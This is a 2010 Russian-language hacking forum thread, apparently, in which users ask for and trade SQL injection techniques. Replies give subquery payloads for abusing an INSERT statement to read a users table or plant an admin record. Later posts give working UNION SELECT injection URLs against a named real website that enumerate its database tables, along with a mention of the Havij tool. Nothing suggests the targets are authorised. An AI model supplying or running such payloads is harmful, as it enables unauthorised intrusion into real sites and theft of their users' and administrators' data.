12.09.2010, 16:31
|
|
Новичок
Регистрация: 29.08.2010
Сообщений: 19
С нами:
8265206
Репутация:
0
|
|
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?
|
|
|
13.09.2010, 00:40
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
С нами:
8452580
Репутация:
3
|
|
Сообщение от rooopster
Привет, подскажите, пожалуйста, чем побыстрее через инъекцию сдампить базу в 18к записей?
http://forum.xakepok.net/showthread.php?t=7222
|
|
|
|
13.09.2010, 16:05
|
|
Новичок
Регистрация: 25.08.2010
Сообщений: 8
С нами:
8270966
Репутация:
0
|
|
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.
|
|
|
|
13.09.2010, 16:12
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от asia555
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
*сделать insert into outfile - не могу, нет прав
**обнаружить select, который бы принимал val2 пока не удалось
Сорри, если это боян. Буду признателен за любую помощь.
я совсем не понял что надо делать, но если ты это хочечь то..
INSERT INTO table_users (val1, val2) values ('blabla','blabla');
выборка
вывод - Select val1,val2 from table_users limit 1;
а INSERT INTO outfile в первые слышу
|
|
|
|
13.09.2010, 18:33
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от asia555
Существует такой запрос
INSERT table_names SET val1=firstname, val2=lastname
Значение val2 могу привести к любому виду.
Задача - добавить запись в table_admin или сделать вывод из table_users.
Возможно ли как-нибудь выкрутиться?
Тоже не совсем понял, что тебе нужно, но вывод,если я правильно понимаю, можно сделать так:
В поле lastname пишем запрос вида
Код:
',firstname=(select {Что_угодно} from table_users limit 1),lastname='pipiska
Если есть инъекция, то после выполнения запроса вместо имени будет выведено то, что было запрошено)
|
|
|
|
13.09.2010, 20:29
|
|
Новичок
Регистрация: 25.08.2010
Сообщений: 8
С нами:
8270966
Репутация:
0
|
|
Сорри, что криво объяснил.
OC - *nix, БД - MySQL. В БД три таблицы table_admin, table_users, table_names. В таблице table_names три поля - user_id, val1, val2.
user_id - это primary key, автоинкримент.
Я обращаюсь к скрипту, в котором есть такой запрос:
INSERT table_names SET user_id=1 val1=firstname, val2=lastname
с val2 я могу делать все что угодно.
Я хочу либо слить таблицу table_users либо добавить запись в table_admin.
Случай 1. Я могу привести запрос к виду:
INSERT table_names SET user_id=1, val1=firstname, val2=(select {Что_угодно} from table_users limit 1)
После чего весь нужный мне вывод попадает в val2 , но я его не вижу. Т.к. SELECT val2 у меня нигде не встречается.
Сообщение от Konqi
а INSERT INTO outfile в первые слышу
Здесь я конечно ерунду написал.
Я имел ввиду, что если бы у меня были права на запись в какой-нибудь файл, то я мог бы попробовать сделать
INSERT table_names SET val1=firstname, val2=(select * from table_users into outfile 'file.txt'). Но так писать в файл я по-видимому не могу =(
Сегодня попробовал на локалхосте:
SELECT username from table_users where user_id=1 INTO outfile 'file.txt' - так работает, файл создается
INSERT table_names SET val1=firstname, val2=(SELECT username FROM table_users WHERE user_id=1 INTO outfile 'file.txt') - так не работает =(
Случай 2. Оставив попытки вывести select * from table_users, я хотел добавить запись в table_admin. Пробовал так:
INSERT table_names SET user_id=1 val1=firstname, val2=(lastname on duplicate key update table_admin SET )
user_id передаю заведомо дублирующийся.
Но насколько я понял, таким запросом с таблицей table_admin ничего не поделаешь. А точнее так - таким запросом не возможно воздействовать ни на какую таблицу кроме table_names. Так ли это?
Что еще можно попробовать сделать в первом и втором случае? |
|
|
|
13.09.2010, 21:10
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
С нами:
8713408
Репутация:
16
|
|
Помогите раскрутить ету скулю.
Код:
http://polvent.com/index.php?action=catalog&brand=-2+UnIon+selECt+1,2,3,4,5,version(),7,8,9,10,11,12,13+from+admin--+
Знаю, что таблица админ. Но к information_schema.tables доступа нет. Или что там такое? Помогите пожалуйста.. |
|
|
|
13.09.2010, 21:25
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
moodoone, вот такого плана инъекция:
Сообщение от None
http://polvent.com/index.php?action=catalog&brand=-2+UNION+ALL+SELECT+1,2,3,4,5,(SELECT+cast(group_co ncat(table_name)+as+char)+FROM+information_schema. tables),7,8,9,10,11,12,13--
Дальше сам знаешь.
|
|
|
|
13.09.2010, 21:34
|
|
Новичок
Регистрация: 21.10.2009
Сообщений: 27
С нами:
8713408
Репутация:
16
|
|
Спасибо! А где можна почитать про такого вида инъекции?
|
|
|
|
13.09.2010, 21:37
|
|
Новичок
Регистрация: 25.11.2009
Сообщений: 0
С нами:
8663103
Репутация:
0
|
|
Не знаю) Я просто прогнал ссылку через прогу "Havij", она спокойно все обработала. Перехватил запрос, ну и поигрался с ним. Ничего особенного)
Вообще, там даже вот так все работает:
Сообщение от None
http://polvent.com/index.php?action=catalog&brand=-2+union+ALL+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13+FROM+information_schema.tabl es--
Фильтры стоят на select и from. |
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|
Похожие темы
Комбинированный вид
